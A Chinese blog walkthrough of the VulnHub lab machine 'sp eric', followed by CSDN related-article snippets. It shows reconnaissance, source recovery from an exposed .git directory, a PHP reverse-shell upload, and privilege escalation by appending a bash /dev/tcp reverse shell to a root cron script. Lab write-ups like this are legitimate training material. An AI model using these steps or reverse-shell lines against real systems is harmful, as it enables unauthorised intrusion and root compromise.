vulnhub系列:sp eric

已于 2024-08-11 15:32:26 修改
阅读量178 收藏 5
点赞数 2
分类专栏: vulnhub系列 文章标签: web安全 网络安全
于 2024-08-11 15:32:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141106406
版权

vulnhub系列:sp eric

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240811143615596

nmap扫描端口,开放端口:22、80

nmap 192.168.23.189 -p- -A -sV -Pn

image-20240811143714473

dirb 扫描目录,.git 源码,admin.php文件,upload目录等

dirb http://192.168.23.189/

image-20240811143733217

访问80端口,没有发现

image-20240811143853630

拼接访问 admin.php ,一个登录框,尝试sql注入,弱口令等,没有结果

image-20240811144043025

看看 .git ,使用 githack 下载源码

python2 GitHack.py -u http://192.168.23.189/.git/

image-20240811145145064

查看下载的源码,发现账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

image-20240811145222291

登录 admin 页面

image-20240811144831193

二、getshell

存在文件上传,kali 生成反弹 shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

image-20240811145901688

修改 IP 和端口后上传,上传后没有什么回显

kali 开启监听

nc -lvnp 4444

image-20240811150109682

虽然没有回显,但是访问 /upload/php-reverse-shell.php,成功反弹 shell

image-20240811150257799

三、提权

使用 python 提升交互性,发现没有python

python -c "import pty;pty.spawn('/bin/bash')"

image-20240811150528435

看一下有无 python3

which python3

image-20240811150603275

有 python3,那么用 python3 执行

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20240811150651778

在 /home/eric 下发现了 backup.sh,backup.zip,flag.txt 这三个文件

image-20240811150824965

查看 flag.txt

image-20240811150901132

查看 backup.sh

image-20240811151224087

可能是计划任务,看一眼

cat /etc/crontab

image-20240811151349335

看了一下,backup.sh 拥有 root 权限,且我们可写可执行

image-20240811151655658

写入反弹 shell 的语句

echo 'bash -i >& /dev/tcp/192.168.23.133/9999 0>&1' >> backup.sh

image-20240811151837670

kali 开启监听

nc -lvnp 9999

image-20240811151925129

成功反弹 shell ,提权成功,是存在计划任务的

image-20240811152247677

最后在 /root 下发现一个 flag.txt

image-20240811152330931

三天三夜睡不着
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SPIP:SPIP核心
02-18
SPIP的核心功能包括文章发布、用户管理、权限控制、多语言支持以及模板系统等,旨在提供一个易于使用且功能强大的平台。 SPIP的核心组件主要包括以下几个方面: 1. **安装与配置**:SPIP的安装过程相对简单,只需...
sp_whoisactive:sp_whoisactive
01-30
`sp_whoisactive`是SQL Server中一个非常实用的存储过程,由Adam Machanic开发,用于实时监控数据库的活动。这个工具可以帮助DBA(数据库管理员)快速了解系统中的查询执行情况,找出性能瓶颈,定位阻塞问题,以及...
更改SQL Server更改当前数据库的所有者:sp_changedbowner
09-11
"更改SQL Server当前数据库的所有者:sp_changedbowner" 在SQL Server中,更改当前数据库的所有者可以通过存储过程sp_changedbowner来实现。该存储过程允许DBA更改当前数据库的所有者,从而实现数据库的权限控制和...
你该知道的NIST SP 800系列指南.pdf
02-10
NIST SP 800系列指南是美国国家标准与技术研究所(National Institute of Standards and Technology, 简称NIST)发布的一系列信息安全和技术标准,旨在为政府机构和私营部门提供网络安全和信息技术的最佳实践。...
floor-sp:地板SP
05-03
Floor-SP:按连续房间最短路径进行平面图的逆向CAD [] [] 内容 概述 这是在ICCV 2019上发布的论文Floor-SP:按顺序房间明智最短路径进行平面图的逆向CAD的正式实施。 Floor-SP将室内空间的对齐RGBD扫描作为输入,...
Gartner发布2024年网络风险管理成熟度曲线:使网络安全战略与业务目标保持一致的概念、方法、流程和技术
lurenjia404的博客
08-07 734
网络风险管理现在是高管和监管机构最关注的问题,它采用多种方法和技术来支持治理、风险管理和合规性。安全和风险管理领导者可以使用此技术成熟度曲线来评估解决方案并做出适当的采用决策。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 970
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Web安全学习
荆鹏的博客
08-06 334
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1452
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
网络安全应急响应
最新发布
goodxianping的专栏
08-10 168
n\n由于本人水平有限,文章中可能会出现一些错误,欢迎各位大佬指正,网络安全应急响应定义\n网络安全应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理,以保护资产安全。\n\n常见的安全事件\n不同的安全事件类型需要不同的应急方式。以下是一些常见的安全事件类型:\n\nWeb入侵:包括挂马、篡改、Webshell等。\n病毒木马:包括远控、后门、勒索软件、挖矿程序等。\n应急响应需解决的问题\n发生上述安全问题时,我们需要解决以下几个关键问题:\n\n本次事件的影响范围有多大?
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
《密码编码学与网络安全原理与实践》第八章伪随机数与流密码
m0_57291352的博客
08-07 944
伪随机数发生器PRNG,使用算法来生成随机数,算法是确定的,产生的序列并非统计随机的,但可以经受住随机性检测。取一个固定值称为种子作为输入,用一个确定的算法产生位输出序列,通过有反馈路径,由算法的部分结果反馈作为输入,而其他部分作为输出位。用1-256个字节(8-2048位)的可变长度密钥初始化一个256个字节的状态向量S,从始至终S包含从0-255所有的8位数,每产生一个k值,S中的元素个体就被重新置换一次。发生器的输出成为密钥流,密钥流和明文流的每一个字节进行按位异或运算,得到一个密文字节。
Kali Linux——网络安全的瑞士军刀
2301_77160226的博客
08-09 1519
网络安全的领域中,Kali Linux 宛如一把强大而全能的瑞士军刀,为安全研究人员和专业人士提供了丰富的工具和资源。Kali Linux 以其丰富的工具集和强大的功能,成为了网络安全领域不可或缺的利器。通过不断学习和实践,您将能够更好地利用 Kali Linux 来保障网络安全,探索未知的安全领域。仅在合法授权的情况下使用 Kali Linux 进行安全测试和研究,避免触犯法律。Kali Linux 工具强大,但需要具备相应的知识和技能才能正确有效地使用。根据个人需求,安装和配置特定的工具和插件。
web安全基础学习
m0_71332744的博客
07-31 706
记录学习的原理,少有实操持续更新
等保测评与网络安全法规遵从:构建合规的信息安全管理体系
w13359990065的博客
08-07 575
通过深入理解等保测评的核心要求,遵循实践指南,企业能够有效提升网络安全防护能力,确保信息资产的安全,同时满足法律法规要求,避免法律风险,赢得客户信任,提升市场竞争力。在实施等保测评与网络安全法规遵从过程中,企业应注重持续改进,将信息安全融入企业文化和日常运营,形成全员参与的信息安全文化,共同守护企业信息资产的安全。2. 风险评估与管理:等保测评帮助企业识别和评估信息系统的安全风险,制定风险应对策略,包括风险缓解、风险转移和风险接受等,提升企业风险管理和应急响应能力。等保测评的角色与作用。
自学-网络安全
m0_70066267的博客
08-07 777
自学网络安全是一个长期而艰巨的过程,需要付出大量的时间和精力。然而,通过系统的学习和实践,可以逐步掌握网络安全的核心知识和技能,为未来的职业发展打下坚实的基础。同时,随着网络安全领域的不断发展壮大,未来的网络安全人才需求也将持续增加。因此,选择自学网络安全不仅是一个提升个人能力的机会,更是一个具有广阔发展前景的职业选择。
网络安全抓包&封包&WEB
m0_73245690的博客
08-07 1205
抓包技术在网络管理、故障排除、安全监控、性能优化、协议分析与开发、数据分析与合规性审计等领域具有重要应用意义。通过抓包,网络管理员和安全专家可以深入了解网络流量,快速定位和解决问题,增强网络安全,优化性能,确保合规性,并为数据驱动决策提供有力支持。抓包工具是实现这些目标的重要手段,选择合适的工具和方法,能够显著提升网络管理和安全工作的效率和效果。Charles 是一款跨平台的 Web 调试代理,适用于 macOS、Windows 和 Linux 系统。
网络安全应急响应概述
黑战士的博客
08-06 526
针对不同的事件类型对事件相关人员进行访谈,了解事件发生的大致情况及涉及的网络、主机等基本信息。制定相关的应急方案和策略后对相关的主机进行排查,一般会从系统排查、进程排查、服务排查、文件痕迹排查、日志分析等方面进行。网络安全应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理,以保护资产安全。该方法将应急响应流程分成准备阶段、检测阶段、抑制阶段、根除阶段、恢复阶段和总结阶段。巧妇难为无米之炊,应急响应有一个前提,那就是我们能够发现入侵行为的发生以及我们保留了入侵行为的日志等文件。
CBK-D4-通信与网络安全、访问控制.md
sdyu_peter的博客
08-06 1011
通信与网络安全osg11\12, 访问控制--osg13\14 CBK-D4-通信与网络安全、访问控制.md
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值